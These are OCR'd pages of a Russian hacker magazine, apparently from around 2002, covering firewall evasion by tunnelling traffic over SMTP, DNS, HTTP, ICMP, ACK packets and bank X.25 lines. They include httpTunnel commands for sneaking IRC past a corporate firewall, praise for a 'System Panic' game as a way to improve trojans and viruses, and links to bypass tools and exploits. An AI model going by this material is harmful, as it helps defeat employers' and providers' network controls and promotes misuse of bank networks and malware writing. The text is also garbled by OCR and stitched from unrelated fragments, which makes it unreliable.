Идем дальше! Допустим твой компьютер установил TCP/IP сессию с поч- 
товым сервером в интернете. И теперь твоя почтовая программа связы- 
вается с почтовым сервером по протоколу SMTP. При этом электронно- 
му письму все равно, через какие модемы оно пройдет, какие шлюзы и 
сети в интернете оно преодолеет, потому что оно движется по SMTP- 
туннелю через глобальную сеть интернет. Этот туннель прозрачен, то 
есть за ним не видно внутреннего устройства сети. 

Ты должен уяснить, что любое сетевое соединение сегодня не обходит- 
ся без туннелирования. Обязательно туннель одного протокола прокла- 
дывается через другой протокол. Чтобы ты лучше это понял, я приведу 
тебе примеры не только хакерских туннелей, но и других туннелей из 
сетевой жизни. 
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Га 


Как ты уже понял из этого номера, туннелирование - 

один из основных способов обхода файрволов и других 
мелких р которые пытаются изобразить бородатые 
админы. Бедненькие, они ведь не знают, с кем воюют! 

А все дело в том, что туннелирование - один из главных 
сетевых принципов современности, ведь без него интернет 
просто не существовал бы! 


рис. Константин Комардин 


ГОЛОСОВОЙ ТУННЕЛЬ 


Знаешь ли ты, что такое ТР-телефония? Да-да-да, это тоже туннель. И в 
некотором роде он тоже используется компаниями для обхода файрво- 
лов. В этом случае с файрволом можно сравнить межгородскую и меж- 
дународную АТС. Если ты хочешь поговорить с Америкой через АТС, то 
тебе прейдет огроменный счет за телефонные услуги. Как же обойти 
этот файрвол? Вспоминаем, что сеть Интернет не заставляет пользова- 
теля платить за соединение в зависимости от географии. Ты платишь 
только за трафик, а с какой точкой мира ты установил соединение не 
важно. Значит осталось проложить голосовой-телефонный туннель че- 
рез почти халявную (по сравнению с телефонной) сеть интернет и мож- 
но будет говорить очень дешево. 

Только чтобы проложить этот туннель, у тебя должны быть два устройст- 
ва, одно будет преобразовывать твой телефонный вызов в интернет- 
трафик - это устройство должно стоять в твоем городе у оператора IP- 
телефонии. Другое устройство будет преобразовывать интернет-трафик 
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в телефонный вызов. Оно должно находиться в городе, где живет твой 
абонент. То есть оно позвонит по местному телефону твоему другу. И 
твоя и чужая АТС примет такой вызов за местный, и тарифицирует его 
по местным тарифам. 

Технологию ТР-телефонии называют Voice over IP, или сокращенно VoIP, 
то есть Голос через Интернет Протокол. Запомни это магическое слово 
OVER, ты еще не раз встретишься с ним! 


ФАЙРВОЛЫ И ТУННЕЛИ 


Как ты уже догадался, файрвол пользуется примерно той же идеологи- 
ей, что и АТС. Он проверяет входящие и исходящие вызовы и в зависи- 
мости от их особенностей решает разрешать или не разрешать. А если 
разрешать, то сколько денег брать с пользователя за соединение. 

Но если файрвол стоит, то есть услуги, которые разрешены. То есть если бы 
нужно было запретить все на свете, то бородатый администратор просто 
бы вынул шнур из сети. А поскольку он поставил файрвол, значит что-то 
через него обязательно должно проходить. Что-то единственное и исклю- 
чительное, что администратор разрешил, остальное проходить не должно. 
Так вот, туннелирование позволяет использовать ЛЮБЫЕ известные ус- 
луги через единственную включенную услугу. Все услуги которые мы 
хотим использовать, и которые нам запрещает файрвол, мы можем 
свернуть в туннель и пустить поверх (Over) единственной разрешенной. 


SMTP ТУННЕЛИ 


Реальная проблема многих хакеров в том, что во многих местах разре- 
шен только почтовый протокол. То есть можно пользоваться только 
почтовым трафиком, все остальные виды трафика обрезает файрвол. 
Допустим, ты сидишь на работе, и у тебя работает только почта. И пра- 
вильно, нечего работником в рабочее время серфить Инет! Но ведь по 
инету полазить хочется! Допустим у тебя есть приятель, у которого на 
работе есть много халявного инета. И ты пишешь ему письма с просьба- 
ми прислать тебе ту или иную страничку. Приятель не жмот, на работе 
ему все равно скучно, и он может выслать тебе по мылу хоть пол-Интер- 
нета, только попроси. Вот и получился простейший туннель НТТР оуег 
SMTP. Ведь по почте ты получаешь HTML документы. 

А теперь представь себе более серьезную и денежную проблему: хакер 
сидит на выделенке. Злобный буржуй-провайдер считает НТТР трафик 
на своем файрволе и нажитые нечестным трудом хакерские денежки 
капают за каждый мегабайт прошедшей через файрвол информации. 
Понятно, что в этом случае просить друга присылать странички по почте 
- вариант тормозной. Вся прелесть выделенной линии пропадает. По- 
этому хакер создает в интернете робота, который в ответ на запросы по 
почте закачивает нужные страницы из интернета и отправляет их по 
почте. При этом хакеру не нужно платить за меЬ-трафик, зтЁр-трафик 
некоторые глупые провайдеры не считают, и денег за него не дерут. 

А теперь другая ситуация, когда хакер надыбал где-то пулы халявной почты. 
То есть можно звонить на телефон провайдера и совершенно бесплатно ка- 
чать почту. Но ведь хакеру нужно и в аське посидеть и по страничкам пола- 
зить. Поэтому хакер пишет две почтовых программы-робота. Одну он веша- 
ет на бесплатном сервере в интернете, а другую на своем компьютере. Один 
робот запаковывает TCP/IP пакеты в почтовый протокол, а другой ux распа- 
ковывает и отправляет в интернет. Получился туннель TCP/IP over SMTP. 
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DNS ТУННЕЛИ 


A теперь возьмем другой вариант, когда провайдер открыл пользовате- 
лям тестовый доступ только на свои странички. То есть пользователь 
дозванивается в интернет и может смотреть странички провайдера, а 
вот смотреть другие странички не дает файрвол. 

И в таком случае хакер не унывает, поскольку он может использовать 
протокол DNS (Domain Name Service). Этот протокол используется для 
определения ТР-адреса по имени странички. Обычно не очень грамот- 
ный провайдер этот протокол не фильтрует и можно отправить DNS-3a- 
прос любому серверу в интернете. Поэтому хакер вешает на бесплатном 
сервере в сети скрипт-робот, который претворяется О№5-сервером. А на 
самом деле в DNS запросах содержится самый обычный Интернет-тра- 
фик. Получился туннель TCP/IP over DNS. 

Культовая статья о возможностях туннелирования DNS на сайте: 
http://list.nfr.com/pipermail/firewall-wizards/2000- 
September/009091.html 

Инструменты для DNS tunneling: http://nstx.dereference.de/ 

На русском: http://tj.ru/cgi-bin/engine.cgi?tj2;8450315;1; 


НТТР ТУННЕЛИ 


Раз уж мы заговорили о бедных жертвах фашистов-администраторов, ко- 
торые не могут сидеть сидеть на работе в интернете, нужно вспомнить 
другую крайность. Часто администраторы разрешают доступ к мер-стра- 
ничкам, если он нужен по работе, но запрещают ICQ, IRC, и наконец мыло. 
В таком случае самые обычные сотрудники (не хакеры) пользуются 
М/ЕВ-гейтами. Сейчас можно получить доступ к Ирке, Аське и конечно к 
мылу через \МЕВ-интерфейс. В таком случае получается ICQ/IRC/e-mail 
over HTTP. И это опять туннель. 

А теперь допустим, что хакеру понадобилось проникнуть через файр- 
волл с разрешенным протоколом НТТР. Понятно, что через НТТР хакер 
может проложить любой тоннель. 

0 НТТР туннелировании можно узнать подробнее и качнуть необходи- 
мый софт здесь: http://www.htthost.com/ (или просто перевернуть 


страницу :)). 


ICMP ТУННЕЛИ 


Принцип туннелирования прост, ведь каждый протокол несет в своем теле 
какую-то полезную информацию. То есть у всех протоколов в том или ином 
виде должно быть информационное поле, в которое этот полезный груз за- 
писывается. Такие поля можно найти даже в протоколе ICMP (Internet 
Control Message Protocol). Если ты помнишь, эхо запросы и эхо ответы могут 
содержать специальные тестовые пакеты, для тестирования качества соеди- 
нения. Так вот вместо этих пакетов хакеры научились подставлять пакеты 
TCP/IP. Обычно если файрвол позволяет пинговать компьютеры располо- 
женные за ним, то он позволит проложить ТСМР-туннель. Обычно этот метод 
хакеры используют для обхода файрволов при взломе серьезных серверов. 
ТСМР туннели и софт для них на сайте: 
http://www.phrack.com/show.php?p=51&a=6 

0 возможностях использования ТСМР-прохода: 
http://www.iss.net/security_center/static/1452.php 


ACK ТУННЕЛИ 


A что же делать хакеру, если попался начитанный администратор, KOTO- 
рый сумел закрыть на файрволе возможности тунелирования SMTP, 
HTTP, DNS, ICMP? Для этого он разработал очень сложные правила 
фильтрования пакетов, и теперь файрвол пропускает пакеты в зависи- 
мости от кучи параметров, а также файрвол не дает установить соеди- 
нение по определенным адресам. 

Так вот, многие файрволы фильтруют в основном SYN пакеты. Дело в том, 
что для установления TCP/IP соединения станции должны пройти через 
процесс тройного рукопожатия и обменяться SYN пакетами. SYN - от сло- 
ва synchronization, то есть две станции пытаются синхронизоваться (до- 
говориться о передачи данных друг другу). После того, как соединение 
установлено, пакетам присваивается статус ACK - от слова acknowledge. 
То есть после процесса синхронизации TCP/IP - соединение считается из- 
вестным (acknowledge). Так думает файрвол, пропуская ACK ТСР пакеты. 
Ведь если мы все проверили на стадии соединения (SYN), то логично 
предположить, что после того как соединение установлено, пакеты (АСК) 


идут правильные. Если файрвол начнет проверять ВСЕ пакеты идущие через него, то он надо- 
рвется. То есть нужен очень мощный компьютер, который бы проверял бы все пакеты. 

Все, что остается хакеру, это научить своих злобных программных роботов устанавливать 
TCP/IP соединение без использования пакетов SYN, а пользуясь только АСК. Вот и получается, 
что такие пакеты свободно проходят через большинство файрволов. 

На этом сайте можно прочитать более подробно о таких туннелях и качнуть пример трояна с 
этой технологией http://ntsecurity.nu/papers/acktunneling/ 

На русском (перевод): 
http://hack.com.ua/article.php?story=20020131004352991&mode=print 


Многие умники ставят себе домашние файрволы и считают себя полностью защищенными от 
Троянских коней. А теперь давай вместе посмеемся над ними, представив представив себе 
Троянца с механизмом туннелирования. Собственно представлять его не надо, посколько та- 
ких написано в изобилии. 


И смех и грех. Некоторые считают, что поставить файрвол недостаточно. Необходимо сделать 
сами сети защищенными, по защищенному стандарту. Отчасти поэтому банковские сети пост- 
роены по более надежной технологии Х.25, не совместимой с TCP/IP. 

Но и тут спасает туннелирование. Используя технологию TCP/IP over Х.25 многие хакеры си- 
дят на халяву в интернете через банковские сети. Для этого они звонят на модемные пулы се- 
ти Х.25 предназначенные для банкоматов, и удаленных банковских отделений. Такие пулы 
есть практически во всем мире. Используя простенький софт можно иметь конечно тормоз- 
ной, но надежный доступ в интернет. Не удивительно, что часто банкоматы не могут дозво- 
ниться на свои пулы Х.25, ведь хакеры сидят в инете именно через них. 

Подробнее о переоборудовании банковских сетей под халявный хакерский инет можно узнать 
на сайте http://ahtuxpuct.fromru.com/free/free.htm. 


Пользователи, которые имеют логин на сервере с файрволом могут проложить туннель через 
терминалы. Для этого необходим простой софт, который позволит копировать TCP/IP трафик 
в терминал. Необходимо два терминала, один открытый в сеть интернет, другой в сеть пользо- 
вателя. Копирование данных между этими терминалами легко осуществимо. 

Чтобы открыть терминал извне понадобиться программа-робот на бесплатном сервере, которая уда- 
ленно откроет терминал и будет преобразовывать текстовую информацию снова в TCP/IP трафик. 
Инструменты для пирсинга файрвла http://fare.tunes.org/files/fwprc/ 

Пирсинг файрвола на русском (перевод): 
http://www.linuxdoc.ru/HOWTO/mini/html/Firewall-Piercing.html 


Туннелирование - настолько разнообразная технология, что с помощью нее можно обойти лю- 
бой, даже самый зверский, мощный, и интеллектуальный файрвол. Просто запомни магичес- 
кое словечко Over, потом задумайся над тем какие протоколы на файрволе разрешены. Доста- 
точно набрать в строке поисковой машины «IP over DNS» или «IP over [разрешенный на файр- 
воле протокол]», и хакер получит сотню ссылок на легкие способы обхода файрволов! 


В ПРОДАЖЕ С 3 ОКТЯБРЯ 


Продолжение "Демиургов" является фактически игрой дру- 
гого жанра. Притом, что все основополагающие элементы 
остались неизменными, всевозможные мелкие и не очень 
нововведения и доработки окончательно сдвинули акценты 
со стратегии в сторону тактики с сильным ролевым уклоном. 


Вас ожидает 400 лет истории Америки, пролетающие перед 
глазами. Вы сможете приложить руку к таким эпохальным 
баталиям, как кампания Христофора Колумба, кампания 
Писарро, война Текумсе, Семилетняя война, и победно 
завершить этот марш-бросок борьбой за независимость 
США в 1813 году. 


Жанр массовых онлайновых RPG родился ровно пять лет 
назад, и его олицетворением стали всего две буквы — UO. 
Детище Лорда Бритиша отмечает свой пятый день рожденья. 


Звук: экстрим или профессионализм? 
Меняем Duron Ha Athlon XP 
Покупаем звуковую плату 


preview, review, Loading, советы по прохождению игр, то 
Игровой трубопровод, 10 RPG всех времен и народов ит.д. 
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Гораздо чаще встречается более банальная ситуевина: на работе корпо- 
ративная сетка под винтукеем, где админ-извращенец запретил все, кро- 
ме НТТР, а дома (или не совсем дома) - шельчик на богом забытом сервач- 
ке где-то на Гавайях. А хочется-то и аськи, и ирки, и МРЗшками в Казее 
(или еще каком гнутеллоподобном клиенте) покидаться. Вот для решения 
таких банальных проблем хороший человек накатал забавную прожку - 
httpTunnel. Умеет она только одно - аккуратно паковать и форвардить чу- 
жой трафик, а самое главное... Самое главное в том, что версий этой про- 
ги имеется целая куча, под все никсы и винды. Что ноздрями-то зашеве- 
лил? Учуял чего? Точно, это же очень неплохой способ решения нашей за- 
старелой проблемы :). 


Наше патентованное средство для натягивания админа состоит, как во- 
дится, из двух независимых частей. Первая работает клиентом и ставится 
на той тачке, с которой нужен доступ во внешнюю сеть по запрещенному 
протоколу (проще говоря, на участке сети, защищенном брэндмауэром). 
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Proxy / firewall 


iw www.klya.com 


localhost 80 |_ +4 
iexplore.exe 
7000 Гы 
Мис.ехе Г __-@——_| 
6666 | 80 
6666 shell.server.com 


80 


7000 


7000 


irc.haxorz.com 


Вторая же должна жить снаружи файрволла Ha шелле или твоем домаш- 
нем компе (если он, конечно, перманентно подрублен к нету). Фишка в 
том, что тебе абсолютно неважно, под какие платформы реализованы от- 
дельные части - клиент под винтукеем вполне ладит с сервером под BSD. 
Так что проблем с реализацией туннеля в жизни быть не должно. 


Давай рассмотрим самый простой вариант - нужно упаковать в протокол 
HTTP трафик твоего Mupka. То есть нужна связь с сервером irc.haxorz.com, 
порт 7000, организовать которую путем подпаивания админа не удалось 
:). Для этого придется конфигурить обе части httpTunnel. 


Прежде чем браться за консоль, давай прикинем, что именно и как имен- 
но мы хотим замутить. Посмотри на рисунок, он наглядно отображает на- 
шу текущую ситуацию. Файрволл сконфигурен так, чтобы пропускать 
только НТТР-трафик, идущий на восьмидесятый порт. Как ты видишь, гад- 
кий ИЕ без проблем соединяется с веб-сервером и даже качает с него ка- 
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кую-то Клю. A вот запрос от Мирка был нахально отклонен :(, так как его 
целевой порт 7000. 

А теперь в нашей игре участвуют два компонента httpTunnel (на картинке 
они изображены синими кружочками). Запросы Мирка идут не Ha irc.hax- 
0г7.сот, а на клиентскую часть httpTunnel, которая перепаковывает их и 
засылает на shell.server.com. А там их уже дожидается наш сервер, пере- 
направляющий весь трафик от клиента на irc.haxorz.com. Вроде все про- 
сто, посмотрим, как связать сервер с клиентом и заставить их работать на 
благо хитрого юзера (т.е. тебя). 


На шелле мы запускаем серверную часть в виде демона, заставляя ее 
ждать коннекта на восьмидесятом порту и форвардить весь поступивший 
трафик (а также не забывать принимать ответный) на наш ирковый сер- 
вак. Выглядит это вот так: 


hts -F irc.haxorz.com:7000 80 


Начнем разборку нестандартно - с конца :). Последним параметром все- 
гда идет номер порта, используемого для соединения клиента и сервера. 
Так как мы маскируемся под НТТР, пусть порт будет 80 - стандартный для 
этого протокола. В параметре -F указываются сервер и порт для редирек- 
та, это, думаю, понятно без разъяснений. Другие возможные варианты пе- 
ренаправления: «-4 название_устройства», когда трафик кидается на дру- 
гой сетевой интерфейс, или «-5» - когда для перенаправления использу- 
ются стандартные stdin-stdout (правда, для этого сервер нужно будет за- 
пускать не демоном, а обычным процессом). 


Теперь займемся клиентом. Если ты еще помнишь, он должен обволаки- 
вать мирковый траф и отправлять его серверу. Для этого на своем компе 
тебе придется запустить такой процесс: 


htc -F 6666 shell.server.com:80 


Здесь все с точностью до наоборот: в параметре «-F» указывается порт, 
трафик с которого пойдет к серверу, а последний параметр отвечает за 
адрес и порт этого злосчастного сервака. Разумеется, замена Ha «-d» и «- 
5» тоже остается в силе. А самое главное - не забудь сказать Мирку, что 
его сервер находится на «localhost:6666». 


Другое дело, если корпоративный файрволл не просто просматривает 
трафик, а заодно отрабатывает программу проксика. В этом случае коли- 
чество промежуточных соединений возрастает (прога -> клиент 


№ 


‚ 
Ia | 
4 
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httpTunnel -> прокси -> сервер httpTunnel -> ирковый сервер). Для того 
чтобы наш туннель без проблем пролезал через прокси, командную стро- 
ку клиента нужно проапгрейдить до следующего вида: 

htc -Р proxy.company.ru:80 -F 6666 shell.server.com:80 


И все! Админы натянуты, траф ползет без препятствий. 


Для любителей поизвращаться у ttpTunnel есть туча параметров, которые сто- 
ит выставить при неидеальных условиях для туннелинга. Краткий их обзор: 


для клиента: 


-А USER:PASSWORD 
пользователь и пароль для не анонимных проксиков (при условии, что 
прокси уже указан в -Р); 


-2 FILE 
та же фигня, только для авторизации используется файл; 


-В BYTES 
размер буфера прокси в байтах (понимает цифры типа 56К и 1М); 


-c BYTES 
выставляет Content-length для запросов; 


-M SECONDS 
максимальное время соединения; 


-T SECONDS 
выставляет тайм-аут для соединения; 


-U STRING 
задает строку user-agent (если админ решит пропускать только ME); 


для обоих: 
-k SECONDS 
посылает keepalive-3anpocb! раз в SECONDS (по дефолту 5); 


-s 
прописывать content-length во все пакеты; 


-w 
не уходить в бэкграунд после запуска. 


Туннель помогает пройти сквозь корпоративный, но не сквозь персональ- 
ный файрволл. Однако при тестировании выяснилось, что персональники 
видят соединения клиента, но не предпринимают никаких действий к их 
завершению (игнорируют, проще говоря). Так что у сказочки может быть 
не просто счастливый, а гиперсчастливый КОНЕЦ! 
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ЗАЛЕ — 


Digital Scream (digitalscream@userline.ru) 


Ты часто споришь со своими друзьями, кто из вас лучший кодер? Ты ломал программы 
на время, пытаясь доказать всем свое мастерство? Нет? Hmmm... Значит, эта статья не 
для tesa. A всем нормальным мучачосам я поведаю cary о новом направлении 
компьютерного андеграунда - “System Panic”. 


КАК ЭТО ВОЗНИКЛО? 


Где-то в 2001 году жила-была группа 
программистов «Angry Activity», и за- 
нимались они написанием программ 
на заказ. Так бы все и продолжалось, 
если бы однажды ни пришел заказ на 
игру... Все должно было быть пре- 
дельно просто - игра, обучающая де- 
тей программировать. Все предпола- 
галось реализовать в виде трехмерной 
игры о войне роботов. Прикол в том, 
что игровым процессом надо было уп- 
равлять не с помощью мышки и кла- 
вы! Все действия роботов определя- 
лись алгоритмами, которые должны 
были разрабатывать ученики. А ты что 
думал, играть можно только руками? 
;). Это все равно, что писать ботов под 
кваку, с одной только разницей: язык, 
на котором будут создаваться алгорит- 
мы воюющих роботов, должен быть 
очень гибким. Учитываться должно 
было все: скорость, оптимальность, 
etc. Заказчик исчез, но наши програм- 
меры настолько увлеклись этой идеей, 
что продолжали работать. Вся пробле- 
ма была в выборе языка, синтаксис 
которого будет основой для скриптов 
управления роботами. И тут кому-то в 
голову пришла идея, которая по сути и 
поменяла направление развития этой 
игры. А идея была проста: есть про- 
грамма, которая отображает роботов 
(по сути это судья), и два робота, реа- 
лизованных в виде DLL (то есть про- 
блема с выбором языка исчезла!), 
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имеющих одинаковые основные функ- 
ции. Получилось так, что каждый дже- 
дай мог кодить своего убийцу на изве- 
стном ему языке программирования. 
Единственное условие - это обяза- 
тельное наличие некоторых функций 
для их совместимости с судьей. Сразу 
же начались разработки, и через два 
дня были уже скомпилированы два 
робота и скелет игры. Они достигли 
того, чего хотели: гибкость кода на 
высоте, скорость робота зависит толь- 
ко от скорости кода, так как роботы 
запускались одновременно в разных 
процессах. Ну и как положено, все это 
дело они обмыли и решили пойти сде- 
лать парочку. .. хе-хе, роботов! :) и 
посражаться... В жестокой схватке, 
сделав тройное сальто, один боец на- 
нес удар кончиком меча в левое ухо 
другого, с той стороны на кото... ой, 
чего-то я увлекся :). Так вот, ко всеоб- 
щему удивлению победил самый про- 
стой и тупой код! Как потом оказа- 
лось, робот, который выиграл, просто 
тормозил все остальные процессы, а 
себе увеличил приоритет по максиму- 
My... Он их хакнул, или мне только ка- 
жется? :). 


ЧТО ЭТО ТАКОЕ? 


Если перевести на великий и могучий, 
«System Panic» - это системная паника 
или паника системы, кому как нравит- 
ся :). Почему такое название, ты ско- 
ро поймешь... Это своеобразная игра 


впервые была проведена в чистом ви- 
де весной 2002 года. Срок достаточно 
небольшой, так что вы еще успеваете 
быть одним из первых чемпионов! В 
ней принимают участие две соревную- 
щиеся программы, цель которых ба- 
нальна - уничтожить противника. Ну 
что, загорелись глазки? Больше нет 
никаких роботов, есть два екзешника, 
не знающих ничего друг о друге, и 
полчаса игрового времени. Два про- 
цесса, соревнующихся за жизнь. Это 
словно закрыть двух вооруженных 
ниндзя в темной комнате с мебелью и 
заставить их убить друг друга. Пред- 
ставляешь, во что это превратится? 
Погибнут невинные стульчики, кресла 
:). Малейший шорох, и все... 


НЕМНОГО О КРЕСЛАХ, В 
СМЫСЛЕ - О ПРАВИЛАХ 


Все происходит в Windows, хотя встре- 
чались бои ив Linux. Программы 
должны иметь права админа/рута 
(нужное подчеркнуть). В автозагрузку 
прописывается программа-судья, ко- 
торая запускает участников в первый 
раз. Дальнейший запуск они должны 
обеспечить себе сами. Бой длится 30 
мин, после чего комп нагло (по резе- 
ту) перезагружается. После загрузки 
программа-судья по процессам опре- 
деляет, какой из участников выиграл. 
И выводит сообщение типа «Выиграл 
участник с 14=п», где п - это номер, 
который должна вернуть программа- 


участник на специфическое сообще- : 
ние GM_GETID. 


Насколько бы ни была жестока игра, | 
правила в ней все-таки есть: 
1. Система должна работать 
Это значит, что ты можешь удалять ! 
все, что угодно, форматировать винт | 
крестиком или в форме ромашки 
или выкачать с Инета 4 гига порно, 
но после всех твоих нехитрых мани- 
пуляций система должна загрузить- 
ся. Наказание - дисквалификация 
участников (обоих). 


э. Судья это святое ! 
Если остановлен процесс судьи или 
после перезагрузки он куда-то 

странным образом исчез :/, то нака- | 
зание то же, что и в первом случае. | 


3. Все остальное мож- 
но 
Можно делать все, исключая вещи, 
указанные в первых двух пунктах. 
Заменять файлы, ставить хуки, пере- ; 
загружать!.. Без вопросов! Можно 
ВСЕ! Это война, подскажите мне, не 
про это ли писали фантасты? Война 
компьютеров, захват территории, 
борьба за выживание, а если к это- ! 
му прибавить искусственный интел- 
лект? Это круто! Что бы ни говорили 
скептики, практика игры «System 
Panic» - лучший способ повысить 
качество троянов и вирей. Это опас- 
но, а значит - для нас. Может хоть ! 
это развлечение не даст умереть 
вирмейкерской сцене и троянописа- | 
телям. 


Информация к раз- 
мышлению: как это 
происходит в элит- 

ных тусовках... 


1. Ha компьютере-жертве (место, где; 
происходит бой) устанавливается 
несколько антивирусов, как прави- ! 
ло, не меньше 2-х. TOT, кого заметят | 
эти доблестные хранители спокойст- 
вия, автоматически проиграл. 

2. Ведется один лог, куда оба виря ! 
пишут о своих действиях, чтобы по- ! 
том можно было определить, где код 
провтыкал, а где достиг 100%. Обыч-: 
но под него отводится один диск на | 
30 метров. Такая себе история вой- 
НЫ :). 
3. В момент сражения программы- | 
участники делают разные графичес- | 
кие выкрутасы с логотипом группы, 
получается, что они борются и за 
видеопространство. Но чаще всего ! 
этот вопрос решается несколькими 


путями, или они меняются экраном 
по времени, или делят именно куски 
экрана! Это уже решают программи- 
сты-участники. 

4. Программа должна умещаться на 
дискету в виде одного файла. 


Р.5.: Поскольку игра достаточно но- 
вая, ресурсов, посвященных ей, в 
Инете не имеется, хотя в узких кру- 
гах ходят слухи, что буржуи грозят- 
ся открыть сайт по этому ВИДУ 
СПОРТА. Кто знает, может именно 
ты и станешь чемпионом! 


в продаже с 


октября 


ВСЕ, ПРИЕХАЛИ! ЭТО НОМЕР БУДЕТ 
ПОСЛЕДНИМ. ДА, ИМЕННО ТАК = ПОСЛЕД- 
НИМ НОМЕРОМ... С ИГРОВЫМ РАЗДЕЛОМ. 
Мы РЕШИЛИ ДАТЬ ТЕБЕ МАКСИМУМ 
ОБЪЕМА ДЕЙСТВИТЕЛЬНО ПОЛЕЗНОЙ ДЛЯ 
ХАКЕРА ИНФРЫ, ТАК ЧТО СО СЛЕДУЮЩЕГО 
НОМЕРА В ТВОЕМ РАСПОРЯЖЕНИИ БУДУТ 
УВЕЛИЧЕННЫЕ РУБРИКИ Взлом, Кодинг 
и РС ZONE. 

А В ЭТОМ МЕСЯЦЕ МЫ НАПОСЛЕДОК 
выложились в JOYSTICKE и прРИГО- 
товили для ТЕБЯ НЕСКОЛЬКО СВЕЖИХ И 
СУПЕР АКТУАЛЬНЫХ МАТЕРИАЛОВ: ЧИТАЙ 
О ТОМ, КАК ПОДНЯТЬ ВЫДЕЛЕННЫЙ 
СЕРВЕР КС, ВО ЧТО ИГРАТЬ ОСЕНЬЮ 

И КАК ПРОХОДИЛИ РОССИЙСКИЕ 
ОТБОРОЧНЫЕ ИГРЫ ВСЕМИРНОЙ KMBEP- 
ОЛИМПИАДЫ. КРОМЕ ЭТОГО, МЫ 
ПРОДОЛЖАЕМ ТЕМУ МОДИНГА - ЕСЛИ 

Ты ПРОПУСТИЛ ПЕРВУНЗ СТАТЬЮ, 

НЕ НАСТУПАЙ НА ГРАБЛИ СНОВА: МОДИНГ 
РЕШАЕТ, И ТЫ УБЕДИШЬСЯ В эТОМ, 
ПРОЧИТАВ НАШУ СТАТЬЮ СТ САМИХ 
ПРОФИ. ВОТ ТЕБЕ ЕЩЕ ДЛЯ ЗАТРАВКИ: 


— Цена Свободы - Реальный прейскурант 
взяток правоохранительным органам по всем 
видам попадосов 
— Резать! К чертовой матери! — 
Полный тюнинг Windows XP на максимум 
секьюрности и скорости, 
— INSIDE - Разбираем флопарь. 
— Взлом и защита в локальных 
сетях - Как тебя могут поиметь в локалке и что 
можешь сделать ты. 
— Интернет черви - Как пишутся черви, 
Вся технология. 

— Пингвин с вибромассажем - 
Полная настройка Линукса под себя. 

— Сервиз на М персон - Стань админом, 
Админом собственного С5-сервака. 
— Modding: руководство к действию 
- Пошаговое руководство, как модить свой комп. 
- Paradox Demo Party - Как мы ездили в Ростов 
и что мы там увидели. 
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НЯ ПОБЕСТНЕ ДНЯ Ч HAC СЕГОДНЯ 


СЕРЬЕЗНЫЕ ВЕШН. Н ТЕБЕ. KAR ВСЕГО Я. НУНЯ 


ИНФОРГАШИЯ. ССЫЙЕН НЯ КОТОРУЮ Я С 


РАДОСТЬЮ Н ПРЕДОСТАВИЯЮ. ТАК ЧТО ЧИТАН 


BOYMYHRO. СНАЧНВНН БЫСТРО, B30 AMbIBAH 


ОСТОРОЖНО. Н дя ПРЕБУДЕТ С ТОБОН ROOT. 


HTTP://WWW.CYBERINFO.RU/6/ 
94_1.HTM 


Ты собрался иметь по полной комп, 
на котором стоит фаерволл? Моло- 
дец! Но я думаю, что прежде чем за- 
няться таким увлекательным делом, 
тебе следует немного разобраться в 
том, как же этот самый фаерволл ра- 
ботает, тогда будет гораздо проще 
его... хм, обойти :). А поможет в 
этом небольшая статейка по линку 
выше. Если честно, то небольшой 
прогруз тебе точно обеспечен, а без 
понимания протокола ТСР/ТР лучше 
ее вообще не читать, ведь «статья 
ориентирована на системных адми- 
нистраторов среднего уровня подго- 
товленности», а сам автор является 
аналитиком безопасности. Зато тут 
тебе вкратце растолкуют, как рабо- 
тает фаерволл и по какому принципу 
он отсеивает одни пакеты и пропус- 
кает другие. В конце статьи есть да- 
же пара прог на перле для тестиро- 
вания фаерволла. В общем, если ты 
не сильно сечешь в принципах функ- 


http://www.cyberinfo.ru/6/94_1.htm 
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ционирования межсетевых экранов 
(но сечешь в протоколах), то тебе 
будет очень полезно почитать этот 
материал. 


HTTP://PIORIO.SUPEREVA.IT/B 
ACKSTEALTH.HTM?P 

Обязательно зайди на этот сайт, где 
наш «брат по оружию» - итальян- 
ский хакер Paolo Тото - объясняет, 
как действительно незаметно для 


http://blackzone.h1.ru 


окружающих обойти фаерволл. И в 
виде бонуса предлагается качнуть 
демо-прогу, в которой реализованы 
на практике все теоретические све- 
дения! Эта небольшая тулзенка мо- 
жет незаметно для нескольких ги- 
гантов защиты скачать текстовый 
файлик с поздравлениями, что секь- 
юрность твоего компа - откровенная 
лажа. Немного огорчает то, что если 
фиглиша ты не знаешь, то и понять 
ничего не сможешь (зато есть аль- 
тернативный вариант - на итальян- 
ском %)). 


> 


Frozen (frozen@real.xakep. ru) 


HTTP://BLACKZONE.H1.RU 


Отличная nara, содержащая доста- 
точное количество инфы как по за- 
щите, так и по взлому (статьи по об- 
ламыванию фаерволлов, ессесно, 
присутствуют). Тут тебя ждет просто 
уйма текста про винтукей, линух и 
прочие системы, на которых можно 
заделать небольшой сервачок с за- 
щитой в виде фаерволла. Небольшая 
проблема с сайтом только в том, что 
онеще не до конца готов (андер кон- 
стракшн, понимаешь), но уже сейчас 
ты сможешь найти на нем стоящие 
вещи. А обсудить прочитанное мож- 
но в чате или оставить свое мнение в 
гестбуке. 


HTTP://KOBAYASHI.CJUB.NET 

Красивый, мощный и быстрый сайт, 
на котором содержится вагон и ма- 
ленькая тележка всяких полезностей 
в виде прог для сканирования и тес- 
тирования фаерволлов и просто ог- 
ромное количество информации по 
фаерволлам: как сделать этой ма- 


http://piorio.supereva.it/back- 
stealth.htm?p 


hitp://www.enteract.com/~Ispitz/ 
intrusion.html 


ленькой вредной программке боль- 
шой и полный. .. ну, ты понял о чем я 
:). Также предлагается куча эксплой- 
тов и статей по разным-разным темам 
(ну и фаерволлы там присутствуют 
повсеместно :). Так что советую тебе 
сюда заглянуть, не пожалеешь точно! 


HTTP://WWW.KNURR.RU/ 
PROJ/SOLUTIONS/EXPERI- 
ENCGCE.HTML 


A по этой ссылке ты найдешь неболь- 
шой талмудик с рассказом про защи- 
Ty сети, а также страшную историю о 
том, как всю организованную безо- 
пасность могут расковырять злые 
хацкеры с нехорошими намерения- 
ми. В общем-то, особого напряга при 
прочтении ты не ощутишь, и, похоже, 
что все это изложено для начинаю- 


http://www.lib.ru/SECURITY 


щих админов, рвущихся в бой с ком- 
пьютерными преступниками. Но все 
же прочитать стоит, иногда попада- 
ются очень полезные сведения, а на- 
личие картинок и схем, наглядно по- 
казывающих работу сети, не может 
не радовать. 


HTTP://RTFM.VN.UA/INET/SEG/ 
NIST/INDEX.HTM 

Серьезная работа с длинным назва- 
нием (или кратко: «Введение в меж- 
сетевые экраны (брандмауэры)») 
предоставляет действительно инте- 
ресную информацию по означенной 
теме. Впитав авторские мысли в се- 
бя, ты практически полностью позна- 


"№ 


ешь принципы работы и построения 
